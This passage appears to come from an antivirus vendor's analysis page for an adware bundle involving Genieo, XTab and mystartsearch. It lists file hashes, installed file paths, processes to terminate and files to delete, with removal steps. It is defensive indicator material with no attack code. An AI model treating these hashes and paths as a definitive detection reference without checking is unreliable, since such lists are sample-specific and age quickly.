555321190ce25bdd169b11ed148b523d | c:\Program Files (x86)\MyPDFConverter\setup\custmon64.dll |
1c3adacafdd5592d44b389e41cf32d54 | c:\Program Files (x86)\MyPDFConverter\setup\pdfwriter.exe |
44927cc68afa6de8c7556d8a4614642b | c:\Program Files (x86)\MyPDFConverter\setup\pdfwriter32.exe |
a265887de685d2f8dbde8036064c61df | c:\Program Files (x86)\MyPDFConverter\setup\pdfwriter64.exe |
efa6b299508db852884ed95a93101273 | c:\Program Files (x86)\MyPDFConverter\setup\unInstpw.exe |
ba4bac1fe450ec1107b1e897deba263c | c:\Program Files (x86)\MyPDFConverter\setup\unInstpw64.exe |
ba4bac1fe450ec1107b1e897deba263c | c:\Program Files (x86)\MyPDFConverter\unInstpw64.exe |
a7998c55467d4884cb509e5c4cfdcfa2 | c:\Program Files (x86)\XTab\BrowerWatchCH.dll |
fbde6af89f9b351243c3f736a48a0543 | c:\Program Files (x86)\XTab\BrowerWatchFF.dll |
5785680870eff9ba7b4f58c726552013 | c:\Program Files (x86)\XTab\BrowserAction.dll |
77590ce0cdeb6bbee8dc056fea0b107c | c:\Program Files (x86)\XTab\CmdShell.exe |
c04d8bc933470b3913e4e3e6c3115793 | c:\Program Files (x86)\XTab\HPNotify.exe |
a330b7929278b18a33e29bd4bb69abc3 | c:\Program Files (x86)\XTab\IeWatchDog.dll |
b32a88b91e59bfb553a9bebf78a1e567 | c:\Program Files (x86)\XTab\ProtectService.exe |
fece5b81614bd16ff043051f338183a0 | c:\Program Files (x86)\XTab\SupTab.dll |
3e29914113ec4b968ba5eb1f6d194a0a | c:\Program Files (x86)\XTab\msvcp110.dll |
4ba25d2cbe1587a841dcfb8c8c4a6ea6 | c:\Program Files (x86)\XTab\msvcr110.dll |
852f4db9b269f52c54f37568d703825e | c:\Program Files (x86)\XTab\uninstall.exe |
a9f1ecb4159ecaf56bbe555f81374f25 | c:\Users\"%CurrentUserName%"\AppData\Local\AppsHat Mobile Apps\Uninstall.exe |
23f833027e99b925ecb69fd095c89faf | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe |
66dd70b68ffc0b8c4e4f9262513299ad | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_a |
127bd1a9d6037e2f42e26a7d3d3032d5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp |
2669e238e25a9dc08e50ca28c3364e10 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\F365.tmp |
d65611fbc4da8cea4e886076bec82d1e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe |
4ca158423c13f6f7ef8e1a0a745384f6 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\STab_Down_6.0.6.6.exe |
55bae15d523e4fabaa551023703d3fd9 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\XTab_v4.0.exe |
c8ac9074c2dfd3814f656d1feca32129 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\wpm_v20.0.0.1714.exe |
518879abe3170dabd172dfffcd165598 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe |
ac8f7611f353ca9803fad5ff81900678 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\biclient.exe |
31f8d1cffb02dff93646f81d8ce3dd75 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe |
4f9236be13917b89f7a03dea85f220fa | c:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe |
d8ba5f4e6a1594d0e07c886dac0f5f8c | c:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\Uninstall.exe |
ac81a34dd4d4b173fb78897fa6fe719f | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\debugInfoCollector.exe |
e032af67bae3ef498bc50c9435310641 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\NativeUtils.dll |
58aa210b2188876b1beb1bb0e796ac20 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\genieutils.exe |
3d7d0dc1234271fd88618c571294ee64 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\x64\NativeUtils.dll |
6e92fc22a6541bc4e5a78b37624e23d7 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\bin\license.exe |
03bec7106b2e338a2ea305fb670a3efa | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\genuninstallui.exe |
03bec7106b2e338a2ea305fb670a3efa | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\genuninstallui.exe |
83a2f2256120d07303a589a3a173c080 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe |
83a2f2256120d07303a589a3a173c080 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\partner_uninstall.exe |
279f9df88a8c988a630547f5c485e7c6 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\bin\gentray.exe |
7bfb3be3e7b0aea2b8d3df8fb28e11c7 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\IeSearchProvider.exe |
f49080e1e1330bd4c712da5109d19085 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\firsttime_setup.exe |
fd1018bc2d2e13587bea7add468e2149 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\genupdater.exe |
9edafc76bc2e693ba0387ec4f3d81ce3 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\genieo_temp\InstallGenieo.exe |
dd7565902d9d990e163cf231782f5c81 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\genieo_temp\genieo_setup.exe |
bc0917682cc2d59539b7e6c6ed2da3ca | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\uninstall\Elevate.exe |
f37d900bd0494d9dbbc688bb407d7061 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\uninstall\updater_uninstall.exe |
dc18fb53cbc6626ad24459faae898aba | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\firsttime_uninstall.exe |
634f09783517492c457987eddb48f94a | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\framework_uninstall.exe |
4b9161c61c4ce0b3a6e39418df7a50a4 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\trayapp_uninstall.exe |
a5abe7fde433ba716f9cdb3b6c2a9c08 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\framework_setup.gen |
dd7565902d9d990e163cf231782f5c81 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\genieo_setup.gen |
d8dfbd86e6df480587a4b210c5b61184 | c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\trayapp_setup.gen |
1087be1ed3e4cf8bac3dfb8bcf76facf | c:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\UninstallManager.exe |
087550b157c8a88f409260ba2dce6386 | c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\ARPPRODUCTICON.exe |
1ac426eff09dd0d1d4b94f417b89ebbe | c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut28_DB02BE8E3D9146699630194C73D82113.exe |
e15ca4067359be510f05a3913e9ce111 | c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut291_65EB53C0CA204902B779CFAD143AB8AE.exe |
e15ca4067359be510f05a3913e9ce111 | c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut292_B804125AD6074B809DEB0A3B3FEFA478.exe |
e15ca4067359be510f05a3913e9ce111 | c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut293_74918538C0B34FDF91C302BD1080E70D.exe |
e15ca4067359be510f05a3913e9ce111 | c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut2941_25E2F3278D06439EA57FC4FE4CAD7B0A.exe |
e15ca4067359be510f05a3913e9ce111 | c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut294_57014926900C495186412973521D7E84.exe |
e15ca4067359be510f05a3913e9ce111 | c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut29_DB2D8C09055445ABAB719D6286A1C90F.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
BaofengUpdate.exe:3600
BaofengUpdate.exe:3212
D79A.tmp:2264
XTab_v4.0.exe:3152
smt_mystartsearch.exe:3356
ProtectService.exe:3120
ProtectService.exe:3188
Setup.exe:4008
Setup.exe:468
TPAutoConnSvc.exe:1844
appshat.exe:4072
biclient.exe:2452
unInstpw64.exe:2004
11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe:3456
powershell.exe:976
powershell.exe:1020
powershell.exe:3596
appshat_generic.exe:108
HPNotify.exe:3132
gentray.exe:2824
gentray.exe:3260
gentray.exe:3080
gentray.exe:1556
genieo_setup.gen:3380
cmdshell.exe:3084
genieo_setup.exe:1552
STab_Down_6.0.6.6.exe:3216
App Lid-codedownloader.exe:3672
App Lid-codedownloader.exe:3264
converter.exe:4068
regsvr32.exe:3688
regsvr32.exe:3720
regsvr32.exe:3404
webplayer_installer.exe:716
framework_setup.gen:1048
InstallGenieo.exe:4052
InstallGenieo.exe:1660
cscript.exe:3120
MsiExec.exe:3588
MsiExec.exe:1612
genupdater.exe:3144
Vlwgfsqfpaz.exe:3296
F365.tmp:3556
firsttime_setup.exe:3488
MSIEXEC.EXE:3852 - Delete the original Application file.
- Delete or disinfect the following files created/modified by the Application:
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\es\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (591 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\newtab.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\install.rdf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\Thumbs.db (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\simple.css (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\googlelogo.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\properties.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\speed_dial.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\bg.png (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\search.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\ru\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\28A7.tmp (90 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\default_logo.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\BFVUpdateM.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\quick_start.xul (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\settings.js (5 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\last_tab.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\pl\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\defaults\preferences\preferences.js (379 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\remoterequest.js (2 bytes)
%Program Files% (x86)\Mozilla Firefox\browser\searchplugins\mystartsearch.xml (565 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\en\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\uninstallDlg2.xml (19 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Web Data (1518 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\stat.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\tr\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\loading.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\style.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\it\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\pack\ga.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\Thumbs.db (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\google_trends.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (480 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\restoreprefs.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\misc.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal (6322 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\addonmanager.js (531 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\icon.png (628 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\422.json (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\en-US\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\es-419\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\quick_start.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\vi\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\js.js (660 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\UninstallManager.exe (13122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\MessageBox.xml (3 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\279D.tmp (89 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\pack\common.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\aes.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome.manifest (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\scrollbar.bmp (37 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\logo.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\defaults\preferences\fvd.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\misc.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\index.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\wpm_v20.0.0.1714.exe (930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\STab_Down_6.0.6.6.exe (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\422.db (220 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\lm (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\NSISEncrypt.dll (3412 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ilg (303824 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\WmiInspector.dll (3137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\nsExec.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\SourceApp.mg.exe (7798 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\tlg (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\IpConfig.dll (4254 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\mj (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\nsJSON.dll (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\ExecDos.dll (13 bytes)
%Program Files% (x86)\XTab\web\img\googlelogo.png (7 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\btn.png (2 bytes)
%Program Files% (x86)\XTab\install.data (68 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files% (x86)\XTab\HPNotify.exe (18027 bytes)
%Program Files% (x86)\XTab\conf (1606 bytes)
%Program Files% (x86)\XTab\web\img\loading.gif (5 bytes)
%Program Files% (x86)\XTab\BrowerWatchFF.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nskDD07.tmp\System.dll (23 bytes)
%Program Files% (x86)\XTab\web\indexIE8.html (1816 bytes)
%Program Files% (x86)\XTab\web\js\library.js (4216 bytes)
%Program Files% (x86)\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\arrow.png (259 bytes)
%Program Files% (x86)\XTab\web\ver.txt (5 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\input_bk.png (2 bytes)
%Program Files% (x86)\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\conf_back.png (1623 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\img\weather\0.png (1 bytes)
%Program Files% (x86)\XTab\skin\btn_apply.png (6 bytes)
%Program Files% (x86)\XTab\skin\conf.xml (8 bytes)
%Program Files% (x86)\XTab\CmdShell.exe (1681 bytes)
%Program Files% (x86)\XTab\web\indexIE.html (1 bytes)
%Program Files% (x86)\XTab\web\_locales\ru-MO\messages.json (4 bytes)
